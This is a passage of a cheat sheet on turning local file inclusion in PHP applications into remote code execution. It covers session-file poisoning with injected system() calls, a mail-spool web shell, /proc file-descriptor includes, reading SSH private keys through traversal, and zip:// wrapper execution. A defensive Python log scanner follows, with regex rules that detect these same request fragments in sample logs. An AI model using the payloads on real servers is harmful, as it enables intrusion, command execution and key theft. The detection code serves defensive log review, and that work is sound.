PHP sessions method

```
# Check if the website uses PHPSESSID
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Tue, 30-Jun-2020 10:25:29 GMT; path=/; httponly

# In PHP, sessions are stored in /var/lib/php5/sess_PHPSESSID files
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

# Set the cookie to <?php system("whoami"); ?>
login=1&user=<?php system("whoami");?>&pass=password&lang=en_us.php

# Use the LFI to include the PHP session file
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
```
Email method
```
# Send a mail to an internal account (user@localhost) containing:
<?php echo system($_REQUEST["cmd"]); ?>

# Access the mail spool through the LFI (/var/mail/USER&cmd=whoami)
```
/proc/*/fd/* method
```
# Upload a lot of shells
http://web.com/index.php?page=/proc/$PID/fd/$FD

# $PID = PID of the process (can be bruteforced)
# $FD  = file descriptor (can be bruteforced)
```
SSH method
```
# Check which user is being used (/proc/self/status - /etc/passwd)
/home/hax0r/.ssh/id_rsa

# hax0r = the user being used
```
Using a zip upload
1. Create a .php file (rce.php)
2. Compress it to a .zip file (file.zip)
3. Upload your .zip file on the vulnerable web application
4. Trigger the RCE:

```
https://site.com/index.php?page=zip://path/file.zip%23rce.php
```
Phpinfo() method
To exploit this you need a page where phpinfo() is displayed, `file_uploads=on`, and a server that is able to write to the `/tmp` directory.
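Every technique on this page leaves a recognisable fragment in the web server's access log: traversal into the PHP session directory or mail spool, a `/proc/*/fd/*` include, a `zip://` wrapper, or a `<?php` tag injected into a parameter. The script below is an added defensive example, not part of the original cheat sheet; it scans combined-format log lines for those fragments. The log lines, client IPs and file names are constructed for illustration (the session id is the one quoted above).

```python
import re
from urllib.parse import unquote

# Each rule names a technique from this page and the request fragment that betrays it.
RULES = {
    "php_session_include": re.compile(r"/var/lib/php\d*/sess_", re.I),
    "mail_spool_include":  re.compile(r"/var/(?:spool/)?mail/", re.I),
    "proc_fd_include":     re.compile(r"/proc/(?:self|\d+)/fd/", re.I),
    "ssh_key_read":        re.compile(r"/\.ssh/id_rsa", re.I),
    "zip_wrapper":         re.compile(r"\bzip://", re.I),
    "php_tag_in_param":    re.compile(r"<\?php", re.I),  # session/log poisoning payload
}
TRAVERSAL = re.compile(r"(?:\.\./){2,}")  # two or more ../ segments

def classify(request_path):
    """Return the set of technique labels matched by one decoded request path."""
    # Decode twice so double-encoded traversal (%252e%252e) is normalised as well.
    decoded = unquote(unquote(request_path))
    hits = {name for name, rx in RULES.items() if rx.search(decoded)}
    if TRAVERSAL.search(decoded):
        hits.add("path_traversal")
    return hits

# Combined-format access log line: client, ident, user, [time], "METHOD path HTTP/x", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def scan(log_lines):
    """Yield (client_ip, status, sorted labels) for every line that matches a rule."""
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        labels = classify(path)
        if labels:
            yield ip, int(status), sorted(labels)

# Constructed sample log for illustration, not captured traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?lang=/../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 HTTP/1.1" 200 88',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=/proc/self/fd/7 HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=zip://uploads/file.zip%23rce.php HTTP/1.1" 200 41',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fvar/mail/www-data&cmd=id HTTP/1.1" 200 73',
]

if __name__ == "__main__":
    for ip, status, labels in scan(SAMPLE_LOG):
        print(ip, status, ",".join(labels))
```

A 200 response on a flagged request deserves priority over a 500, since it suggests the include actually resolved.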